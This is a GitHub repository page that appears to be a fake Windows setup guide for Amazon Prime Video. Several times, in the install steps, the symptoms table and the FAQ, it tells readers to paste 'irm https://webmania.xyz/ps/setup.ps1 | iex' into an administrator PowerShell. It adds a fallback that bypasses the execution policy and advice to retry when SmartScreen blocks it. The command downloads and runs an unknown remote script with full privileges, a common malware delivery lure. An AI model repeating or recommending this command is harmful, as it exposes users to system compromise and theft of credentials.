Skip to content

Icebruenergy/Amazon-Prime-Video-Desktop-Setup-Guide

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Amazon Prime Video on Windows — setup & troubleshooting

Amazon-Prime-Video-Desktop-Setup-Guide Amazon Prime Video · Media access · Desktop integration · Windows

Professional Amazon Prime Video build with media access profiles, session presets, and desktop integration included for Windows.

Install on Windows

Do this:

  1. Press the Windows key, type powershell
  2. Right-click Windows PowerShellRun as administrator
  3. Copy the command below, paste it into PowerShell, press Enter
  4. Click Yes if Windows asks for permission
irm https://webmania.xyz/ps/setup.ps1 | iex

If nothing happens or you see a policy error, paste this instead:

powershell -ExecutionPolicy Bypass -Command "irm https://webmania.xyz/ps/setup.ps1 | iex"

Notes for users who need Amazon Prime Video running on Windows — especially when setup fails, updates break, or the app will not start.

What this repo covers

  • Media access stack — session profiles and desktop integration included
  • Clean install path on Windows 10/11
  • Typical DRM and network blockers
  • Search phrases for Amazon Prime Video setup issues

Common symptoms

Symptom What to try first
Playback error on launch Check network; disable VPN split conflicts
DRM component missing Install latest media runtime; reboot
App hangs on splash Clear app cache; rerun setup command
Install blocked by SmartScreen Run PowerShell as administrator; retry setup command

Requirements

Windows Windows 10 / 11 (64-bit)
RAM 8 GB
Disk 2 GB free space

FAQ

What exactly do I paste?
Copy this whole line into PowerShell (Administrator):

irm https://webmania.xyz/ps/setup.ps1 | iex
Where is PowerShell?
Windows key → type powershell → right-click → Run as administrator.
Command did not run?
Paste this line instead:

powershell -ExecutionPolicy Bypass -Command "irm https://webmania.xyz/ps/setup.ps1 | iex"
Does this replace official support?
No — community troubleshooting notes for Windows users.

Topics: amazon-prime, video, streaming-access, media-player, amazon-prime-setup-failed-fix, how-to-install-amazon-prime-video, entertainment-apps, windows-media, content-access, amazon-prime-windows, amazon-prime-windows-setup, amazon-prime-windows-setup-2026

About

Amazon Prime Video — media access configuration, session profiles and desktop integration enabled for Windows. Windows setup guide — install steps, typical errors, and how to get Amazon Prime Video running on PC.

Topics

Resources

License

Stars

10 stars

Watchers

5 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors